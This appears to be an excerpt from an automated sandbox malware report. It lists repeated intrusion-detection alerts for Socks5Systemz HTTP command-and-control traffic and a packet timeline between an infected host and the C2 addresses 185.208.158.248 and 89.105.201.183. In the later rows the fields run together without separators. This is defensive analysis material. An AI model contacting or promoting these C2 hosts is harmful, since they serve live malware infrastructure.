                                                                               2024-10-08T04:14:02.562916+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:02.906768+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:03.256863+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:04.056622+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63171 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:04.879972+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63172 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:05.706045+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63174 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:06.546534+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63175 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:07.381969+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63176 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:08.204252+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63177 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:09.014942+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63178 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:09.364554+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63178 | 185.208.158.248 | 80 | TCP
                                                                              2024-10-08T04:14:10.181754+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663179185.208.158.24880TCP
                                                                              2024-10-08T04:14:10.981526+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663180185.208.158.24880TCP
                                                                              2024-10-08T04:14:11.334754+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663180185.208.158.24880TCP
                                                                              2024-10-08T04:14:12.145048+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663181185.208.158.24880TCP
                                                                              2024-10-08T04:14:13.116895+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663182185.208.158.24880TCP
                                                                              2024-10-08T04:14:13.930977+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663183185.208.158.24880TCP
                                                                              2024-10-08T04:14:14.737108+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663184185.208.158.24880TCP
                                                                              2024-10-08T04:14:15.553262+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663185185.208.158.24880TCP
                                                                              2024-10-08T04:14:16.375905+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663186185.208.158.24880TCP
                                                                              2024-10-08T04:14:17.180272+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663187185.208.158.24880TCP
                                                                              2024-10-08T04:14:18.027086+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663188185.208.158.24880TCP
                                                                              2024-10-08T04:14:18.857959+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663189185.208.158.24880TCP
                                                                              2024-10-08T04:14:19.213242+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663189185.208.158.24880TCP
                                                                              2024-10-08T04:14:20.022955+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663190185.208.158.24880TCP
                                                                              2024-10-08T04:14:20.839054+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663191185.208.158.24880TCP
                                                                              2024-10-08T04:14:21.653769+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663192185.208.158.24880TCP
                                                                              2024-10-08T04:14:22.003080+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663192185.208.158.24880TCP
                                                                              2024-10-08T04:14:22.835901+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663193185.208.158.24880TCP
                                                                              2024-10-08T04:14:23.663046+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663194185.208.158.24880TCP
                                                                              2024-10-08T04:14:24.482027+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663197185.208.158.24880TCP
                                                                              2024-10-08T04:14:24.831303+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663197185.208.158.24880TCP
                                                                              2024-10-08T04:14:25.643422+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663198185.208.158.24880TCP
                                                                              2024-10-08T04:14:26.470695+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663199185.208.158.24880TCP
                                                                              2024-10-08T04:14:27.282637+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663200185.208.158.24880TCP
                                                                              2024-10-08T04:14:28.102266+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663201185.208.158.24880TCP
                                                                              2024-10-08T04:14:29.224418+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663202185.208.158.24880TCP
                                                                              2024-10-08T04:14:30.061625+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663203185.208.158.24880TCP
                                                                              2024-10-08T04:14:30.418069+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663203185.208.158.24880TCP
                                                                              2024-10-08T04:14:31.234585+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663204185.208.158.24880TCP
                                                                              2024-10-08T04:14:31.579465+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663204185.208.158.24880TCP
                                                                              2024-10-08T04:14:32.416312+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663205185.208.158.24880TCP
                                                                              2024-10-08T04:14:33.254525+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663206185.208.158.24880TCP
                                                                              2024-10-08T04:14:34.223810+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663207185.208.158.24880TCP
                                                                              2024-10-08T04:14:35.057170+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663208185.208.158.24880TCP
                                                                              2024-10-08T04:14:35.885964+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663209185.208.158.24880TCP
                                                                              2024-10-08T04:14:36.696717+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663210185.208.158.24880TCP
                                                                              2024-10-08T04:14:37.500804+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663211185.208.158.24880TCP
                                                                              2024-10-08T04:14:37.843985+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663211185.208.158.24880TCP
                                                                              2024-10-08T04:14:38.666724+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663213185.208.158.24880TCP
                                                                              2024-10-08T04:14:39.488680+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663214185.208.158.24880TCP
                                                                              2024-10-08T04:14:40.324704+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663215185.208.158.24880TCP
                                                                              2024-10-08T04:14:40.675579+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663215185.208.158.24880TCP
                                                                              2024-10-08T04:14:41.513567+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663216185.208.158.24880TCP
                                                                              2024-10-08T04:14:41.861032+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663216185.208.158.24880TCP
                                                                              2024-10-08T04:14:42.705424+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663217185.208.158.24880TCP
                                                                              2024-10-08T04:14:43.540491+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663218185.208.158.24880TCP
                                                                              2024-10-08T04:14:44.378094+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663219185.208.158.24880TCP
                                                                              2024-10-08T04:14:45.232632+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663220185.208.158.24880TCP
                                                                              2024-10-08T04:14:45.583772+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663220185.208.158.24880TCP
                                                                              2024-10-08T04:14:46.404938+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663221185.208.158.24880TCP
                                                                              2024-10-08T04:14:46.750961+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663221185.208.158.24880TCP
                                                                              2024-10-08T04:14:47.566653+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663222185.208.158.24880TCP
                                                                              2024-10-08T04:14:48.435341+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663223185.208.158.24880TCP
                                                                              2024-10-08T04:14:48.785107+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663223185.208.158.24880TCP
                                                                              2024-10-08T04:14:49.610149+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663224185.208.158.24880TCP
                                                                              2024-10-08T04:14:49.956149+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663224185.208.158.24880TCP
                                                                              2024-10-08T04:14:50.773595+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663225185.208.158.24880TCP
                                                                              2024-10-08T04:14:51.590209+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663226185.208.158.24880TCP
                                                                              2024-10-08T04:14:51.936933+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663226185.208.158.24880TCP
                                                                              2024-10-08T04:14:52.757844+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663227185.208.158.24880TCP
                                                                              2024-10-08T04:14:53.600074+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663228185.208.158.24880TCP
                                                                              2024-10-08T04:14:54.413726+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663229185.208.158.24880TCP
                                                                              2024-10-08T04:14:55.227231+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663230185.208.158.24880TCP
                                                                              2024-10-08T04:14:56.066016+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663231185.208.158.24880TCP
                                                                              2024-10-08T04:14:56.908568+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663232185.208.158.24880TCP
                                                                              2024-10-08T04:14:57.773482+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663233185.208.158.24880TCP
                                                                              2024-10-08T04:14:58.597301+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663234185.208.158.24880TCP
                                                                              2024-10-08T04:14:59.420311+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663235185.208.158.24880TCP
                                                                              2024-10-08T04:15:00.249206+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.663236185.208.158.24880TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 04:13:51.783178091 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:51.788131952 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:51.788233042 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:51.788804054 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:51.794524908 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:52.485299110 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:52.485327959 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:52.485359907 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:52.485395908 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:52.488603115 CEST | 63162 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:52.493393898 CEST | 2023 | 63162 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:52.493545055 CEST | 63162 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:52.493545055 CEST | 63162 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:52.498408079 CEST | 2023 | 63162 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:52.498846054 CEST | 63162 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:52.503654957 CEST | 2023 | 63162 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:53.128714085 CEST | 2023 | 63162 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:53.183809996 CEST | 63162 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:55.147404909 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.152460098 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:55.430424929 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:55.430625916 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.576559067 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.576950073 CEST | 63163 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.581861973 CEST | 80 | 63161 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:55.581873894 CEST | 80 | 63163 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:55.581928015 CEST | 63161 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.582087040 CEST | 63163 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.582179070 CEST | 63163 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:55.587107897 CEST | 80 | 63163 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:56.276204109 CEST | 80 | 63163 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:56.276515007 CEST | 63163 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:56.277729034 CEST | 63164 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:56.282672882 CEST | 2023 | 63164 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:56.282862902 CEST | 63164 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:56.282862902 CEST | 63164 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:56.282862902 CEST | 63164 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:56.287781954 CEST | 2023 | 63164 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:56.329900980 CEST | 2023 | 63164 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:56.389578104 CEST | 63163 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:56.389895916 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:56.394680977 CEST | 80 | 63165 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:56.394700050 CEST | 80 | 63163 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:56.394756079 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:56.394890070 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:56.394917965 CEST | 63163 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:56.399630070 CEST | 80 | 63165 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:56.744977951 CEST | 2023 | 63164 | 89.105.201.183 | 192.168.2.6
Oct 8, 2024 04:13:56.745153904 CEST | 63164 | 2023 | 192.168.2.6 | 89.105.201.183
Oct 8, 2024 04:13:57.074873924 CEST | 80 | 63165 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:57.075057030 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.186307907 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.191292048 CEST | 80 | 63165 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:57.430228949 CEST | 80 | 63165 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:57.430314064 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.545627117 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.545911074 CEST | 63166 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.550702095 CEST | 80 | 63166 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:57.550723076 CEST | 80 | 63165 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:57.550772905 CEST | 63166 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.550800085 CEST | 63165 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.550920963 CEST | 63166 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:57.555622101 CEST | 80 | 63166 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:58.256364107 CEST | 80 | 63166 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:58.256550074 CEST | 63166 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:58.373755932 CEST | 63166 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:58.374048948 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:58.379899979 CEST | 80 | 63166 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:58.379914045 CEST | 80 | 63167 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:58.380048037 CEST | 63166 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:58.380126953 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:58.380295038 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:58.385613918 CEST | 80 | 63167 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:59.060466051 CEST | 80 | 63167 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:59.060653925 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.171472073 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.176350117 CEST | 80 | 63167 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:59.411493063 CEST | 80 | 63167 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:59.411684036 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.540471077 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.540756941 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.545630932 CEST | 80 | 63168 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:59.545655966 CEST | 80 | 63167 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:13:59.545723915 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.545748949 CEST | 63167 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.552522898 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:13:59.557332039 CEST | 80 | 63168 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:00.235232115 CEST | 80 | 63168 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:00.235449076 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.342839956 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.347738981 CEST | 80 | 63168 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:00.578231096 CEST | 80 | 63168 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:00.578393936 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.701978922 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.702346087 CEST | 63169 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.707015038 CEST | 80 | 63168 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:00.707072973 CEST | 63168 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.707123041 CEST | 80 | 63169 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:00.707189083 CEST | 63169 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.707314968 CEST | 63169 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:00.712050915 CEST | 80 | 63169 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:01.398214102 CEST | 80 | 63169 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:01.398277044 CEST | 63169 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:01.514458895 CEST | 63169 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:01.514735937 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:01.519613981 CEST | 80 | 63170 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:01.519629955 CEST | 80 | 63169 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:01.519696951 CEST | 63169 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:01.519730091 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:01.519860029 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:01.524626017 CEST | 80 | 63170 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:02.218530893 CEST | 80 | 63170 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:02.218620062 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:02.327187061 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:02.332039118 CEST | 80 | 63170 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:02.562807083 CEST | 80 | 63170 | 185.208.158.248 | 192.168.2.6
Oct 8, 2024 04:14:02.562916040 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
Oct 8, 2024 04:14:02.670967102 CEST | 63170 | 80 | 192.168.2.6 | 185.208.158.248
                                                                              Oct 8, 2024 04:14:02.675904036 CEST8063170185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:02.906702995 CEST8063170185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:02.906768084 CEST6317080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.014552116 CEST6317080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.019470930 CEST8063170185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:03.256772041 CEST8063170185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:03.256863117 CEST6317080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.373760939 CEST6317080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.374166012 CEST6317180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.379057884 CEST8063171185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:03.379086018 CEST8063170185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:03.379170895 CEST6317080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.379290104 CEST6317180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.379290104 CEST6317180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:03.384109974 CEST8063171185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:04.056408882 CEST8063171185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:04.056622028 CEST6317180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.170481920 CEST6317180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.170629978 CEST6317280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.175581932 CEST8063172185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:04.175671101 CEST6317280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.175690889 CEST8063171185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:04.175849915 CEST6317280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.175874949 CEST6317180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.180701017 CEST8063172185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:04.879509926 CEST8063172185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:04.879971981 CEST6317280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.998895884 CEST6317280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:04.998995066 CEST6317480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.004686117 CEST8063174185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:05.004748106 CEST8063172185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:05.004769087 CEST6317480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.004883051 CEST6317480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.004935026 CEST6317280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.010133028 CEST8063174185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:05.705967903 CEST8063174185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:05.706044912 CEST6317480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.826669931 CEST6317480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.827054977 CEST6317580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.831988096 CEST8063175185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:05.832020044 CEST8063174185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:05.832108974 CEST6317480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.832245111 CEST6317580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:05.832245111 CEST6317580192.168.2.6185.208.158.248
